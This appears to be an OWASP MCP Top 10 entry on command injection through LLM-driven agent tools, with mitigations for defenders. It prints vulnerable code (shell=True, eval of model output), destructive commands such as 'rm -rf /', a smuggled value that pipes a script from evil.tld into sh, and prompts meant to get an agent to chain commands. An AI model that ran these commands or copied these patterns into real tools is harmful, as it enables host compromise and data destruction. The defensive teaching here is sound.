(OWASP Model Context Protocol Top 10)
Category: Injection / Remote Code Execution Severity: Critical Exploitability: High Impact: Full Host Compromise, Data Destruction, Persistence
MCP05:2025 – Command Injection & Execution occurs when LLM-driven MCP agents pass untrusted input into system-level commands, scripts, or interpreters, resulting in arbitrary command execution.
This is the classic command injection vulnerability, reborn in an MCP context — but with a twist:
The attacker doesn’t inject code into a form. They inject intent into the model.
The LLM becomes the exploit delivery mechanism.
This vulnerability impacts:
- MCP tools executing shell commands
- Python
subprocess, Nodechild_process - Infrastructure automation tools
- CI/CD MCP agents
- SOC / remediation agents
- Any tool that touches the OS, cloud CLI, or interpreters
Extremely high-risk MCP use cases:
- Auto-remediation agents
- “Fix-it” DevOps copilots
- Security response automation
- Backup / restore agents
- File system management tools
| Root Cause | Explanation |
|---|---|
| Unsanitized input | User or context passed to shell |
| LLM-controlled arguments | Model builds commands dynamically |
| Overpowered tools | Tools run with high privileges |
| Blind execution | No allowlist / validation |
| “Helpful” design | Agent tries to solve problems aggressively |
Traditional command injection:
User → Input → Command
MCP command injection:
User → Prompt → LLM → Tool → OS
Each hop dilutes responsibility, making the exploit feel “unintentional” — but the impact is worse.
Also:
- No exploit payload required
- No bypass tricks
- Natural language is enough
cmd = f"ping {user_input}"
os.system(cmd)LLM + untrusted input = RCE.
eval(model_output)This is instant compromise.
kubectl delete pod $TARGETIf $TARGET is LLM-controlled → disaster.
User: Fix the issue permanently.
The model escalates from:
- reading logs
- to modifying configs
- to executing destructive commands
def run_cmd(cmd):
subprocess.run(cmd, shell=True)Check disk usage for /; then clean up unnecessary files.
df -h /; rm -rf /tmp/*Or worse:
rm -rf /- Command executed
- No validation
- Full system impact
# BAD PRACTICE
command = f"tar -czf backup.tar.gz {path}"
subprocess.run(command, shell=True)Input:
path = "/data; curl evil.tld/pwn.sh | sh"
MCP05 achieved.
Identify tools that:
- Execute shell commands
- Call interpreters
- Invoke CLIs
Any such tool = high-value target.
Try:
Use a safe command to inspect the system.
Then:
Combine steps to make it faster.
Watch for command chaining, pipes, redirects.
Check:
- Command logs
- Shell history
- Audit logs
Look for:
;&&|- backticks
$()
- Semgrep (command injection rules)
- Bandit (Python)
- ESLint Security Plugins
- eBPF-based command monitoring
- Auditd
- Falco
- Sysmon (Windows)
subprocess.run(["ping", "8.8.8.8"])Never allow string-based shell execution.
Only predefined commands and flags:
ALLOWED_FLAGS = ["-h", "-v"]Reject everything else.
- LLM decides what
- Execution layer decides if allowed
The LLM must never construct commands freely.
- Non-root users
- Containers
- Sandboxes
- Seccomp / AppArmor
Assume compromise. Contain blast radius.
Any command that:
- deletes
- modifies
- escalates
Requires approval.
- OWASP Injection Prevention Cheat Sheet
- CWE-78: OS Command Injection
- Secure Subprocess Patterns
- Cloud CLI Security Best Practices
- Real-World DevOps RCE Incidents
- Any tool executes shell commands?
- Is
shell=Trueused? - Can LLM influence arguments?
- Are commands allowlisted?
- Are executions sandboxed?
- Is human approval required?
Any yes without controls → MCP05 confirmed
MCP05 is old-school RCE with a new trigger.
If:
- your agent can run commands
- your model controls arguments
- your system trusts the output
…then language becomes the exploit.
Never let an LLM touch a shell unsupervised. Ever.